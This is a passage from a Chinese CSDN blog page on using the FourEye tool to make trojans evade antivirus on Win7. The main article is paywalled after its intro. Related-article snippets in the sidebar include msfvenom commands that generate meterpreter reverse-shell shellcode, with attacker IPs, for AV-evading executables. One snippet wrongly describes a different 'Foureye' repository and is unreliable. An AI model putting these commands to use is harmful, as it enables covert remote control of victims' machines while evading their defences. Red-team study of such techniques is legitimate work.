FourEye 免杀

最新推荐文章于 2024-08-09 08:16:32 发布
最新推荐文章于 2024-08-09 08:16:32 发布
阅读量779 收藏 1
点赞数
分类专栏: 渗透测试基础 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43650289/article/details/111058115
版权
本文介绍了在Win7环境下,利用FourEye工具进行免杀技术的实践,包括32位和64位系统下的BypassAV1到BypassAV3方法。在32位系统中,360杀毒软件能检测到木马,而在64位系统中成功绕过查杀。分析了可能的原因,并提到了对代码的魔变修改以适应32位系统。
摘要由CSDN通过智能技术生成

目录

描述

环境

过程

win7 32位

BypassAV1

BypassAV2

BypassAV3

win7 64位

BypassAV3

BypassAV2

BypassAV1

总结

分析

BypassFramework.py

魔变

参考链接

描述

经过尝试并且借鉴FourEye(重明) - AV Evasion Tool For Red Team 文章的相关内容,把相关的过程分享给大家,感兴趣的同学可以进行尝试一下,不过在实践中发现了一些小问题,大家可以自己看过程;

使用在win7 32位环境下,容易被检测出;使用在win7 64位环境下,不易被检测出;【使用kali2020运行出了问题,面临i686-w64-mingw32-g++编译win-vlc问题】

环境

kali 2018

win7 32位

win7 64位

在kali上下载工具

git clone https://github.com/lengjibo/FourEye

了解本专栏 订阅专栏 解锁全文 超级会员免费看
战神/calmness
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
FourEye:适用于Red Team Ops的AV规避工具
03-10
FourEye(重明)-Red Team Ops的AV逃避工具为快速生成免杀的EXE嵌入文件,目前拥有三种免杀方法。 ______ ___ (_) | / (_) _|_ __ ,_ \__ _ / | |/ \_| | / | / | | |/ (_/ \__/ \_/|_/ |_/\___/ \_/|/|__/ /| \| v...
【渗透测试笔记】之【免杀工具——msfvenom+FourEye
AA8j的博客
07-06 506
利用msfvenom生成shellcode: msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=44444 -e x86/shikata_ga_nai -i 10 -f raw -b '\x00\x0a\x0d' > ~/Desktop/Trojan/test.bin 利用FourEye生成exe: FourEye >>shellcode FourEye(shellcode) >>1 F.
关于sh: not found问题
GjGsoft's Technical Blog
04-09 7360
今天原本准备在QT210开发板上跑个hello world。没想到用arm-none-linux-gnueabi-gcc hello.c编译运行后,出现sh: not found,初看起来应该和动态库有关,于是开始了一段长达8小时的艰辛之旅,期间获益不少,记录如下。     首先,这款开发板预装的是android的环境,安卓环境的libc和gnu的libc有很多不同,编译过程区别也很大,我简单看
免杀/免杀-小白漏洞笔记
程序员三九的博客
07-21 354
MSF 已经是广为人知的非常流行的渗透平台,没有之一。而作为专注于后渗透的我,最常用的也是 MSF 强大的后渗透功能。
免杀工具 -- FourEye
weixin_41489908的博客
01-12 6918
今天有一点想你,其实,不止一点,其实,不止今天。。。 ​----网易云热评 一、简介 快速生成免杀exe可执行文件,目前拥有三种免杀的方法 二、下载及安装 1、下载到本地 git clonehttps://github.com/lengjibo/FourEye.git 2、进入该文件夹 cd FourEye 3、安装需要的python库 pip install -r requirements.txt 三、使用方法 1、打开该软件 python3 Byp...
网络安全进阶篇之免杀(十四章-4) py3的CS免杀过火绒
划水的小白白
05-20 532
文章目录一、 概念1.1 360 安全卫士和 360 杀毒1.2 Python二、前期准备2.1 python下载地址三、具体过程3.1 CS生成payload3.2 编译python代码框架3.3 将py文件生成exe 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、360 主动防御引擎以
实测FourEye免杀 vs 实战化白帽子如何学习
Ms08067安全实验室
03-18 844
文章来源|MS08067 内网安全知识星球本文作者:Ryze(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067本文目的只为了解免杀技术和配合攻击技术达到一定攻击效果,文中...
d2d控件,win10,script
03-19
压缩包子文件的文件名称列表中,"FourEye.exe"可能是一个使用Direct2D技术构建的应用程序,"Data"可能包含用于绘制图形的数据文件,而"Script"可能是执行特定任务或控制图形显示的脚本文件。这些文件如何协同工作取...
火绒bypass
weixin_44216796的博客
02-01 471
前言 1.25日之前免杀,现在已经挂了,毕竟开源了。。。 步骤 生成shellcode FourEye免杀 项目地址:https://github.com/lengjibo/FourEye 效果 正常上线 原文地址 公众号“鸿鹄实验室”
【新版】掩日免杀windows Defender
crowsec
06-05 6303
掩日免杀是一个非常优秀的项目,目前在`4月19`号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:
新版掩日免杀——搭配CS使用测试
ZxC789456302的博客
10-05 1768
使用工具:掩日免杀 环境需求: 64位 Windows 7 或以上操作系统 .net framework 4.5 或更高
免杀手法 免杀笔记 免杀技巧
07-15
免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧免杀手法 免杀笔记 免杀技巧
源码免杀工具
12-14
自己写的一个源码免杀工具 简单实用 免杀源码 远控源码免杀工具
Foureye实现免杀
reaido的博客
01-29 614
一、项目地址 https://github.com/lengjibo/FourEye 推荐挂代理 二、相关命令 git clone https://github.com/lengjibo/FourEye.git cd FourEye pip install -r requirements.txt 三、msfvenom生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f raw -o
掩日:红队行动中的综合免杀利器
gitblog_00068的博客
06-07 457
掩日:红队行动中的综合免杀利器 AV_Evasion_Tool掩日 - 免杀执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool 在网络安全的世界里,对抗是永不停息的主题。当红队执行任务时,如何确保渗透工具逃避杀毒软件的监控,成为了至关重要的一环。这就是掩日——一个专为红队设计的综合免杀工具,它的存在就是为了提供强大的隐蔽...
掩日免杀笔记
crowsec
06-01 4548
微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 环境 攻击机: kali linux 10.211.55.23 受害机: Windows10 360主动防御 Windows7 火绒主动防御 2. 生成exe文件 在kali linux下使用msfvenom生成一个64位的exe文件 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe ...
shellCode免杀技巧
qq_39330735的博客
05-15 2442
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
红队培训班作业 | 免杀过360和火绒 四种方法大对比
Ms08067安全实验室
08-16 2916
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
掩日 - 免杀执行器生成工具 使用指南
最新发布
gitblog_00851的博客
08-09 567
掩日 - 免杀执行器生成工具 使用指南 AV_Evasion_Tool掩日 - 免杀执行器生成工具项目地址:https://gitcode.com/gh_mirrors/ave/AV_Evasion_Tool 项目介绍 掩日是一款强大的免杀执行器生成工具,由开发者 1y0n 在 GitHub 上维护。该工具设计用于避开常见的安全软件检测,通过一系列技术手段使生成的执行文件能够绕过大多数防病毒软件...
kali安装foureye
04-06
Kali Linux是一款基于Debian的Linux发行版,主要用于渗透测试和网络安全。Foureye是一个开源的信息收集工具,用于收集目标系统的信息。下面是安装Foureye的步骤: 1. 首先,确保你已经在Kali Linux上安装了Python和Git。如果没有,请使用以下命令安装: ``` sudo apt update sudo apt install python3 git ``` 2. 打开终端,使用以下命令克隆Foureye的代码库: ``` git clone https://github.com/Anon-Exploiter/Foureye.git ``` 3. 进入Foureye目录: ``` cd Foureye ``` 4. 安装所需的Python依赖: ``` pip3 install -r requirements.txt ``` 5. 运行Foureye: ``` python3 foureye.py ``` 现在,你已经成功安装并运行了Foureye。请注意,Foureye是一个强大的信息收集工具,使用时需要遵守法律和道德规范,仅用于合法的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

战神/calmness

你的鼓励是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值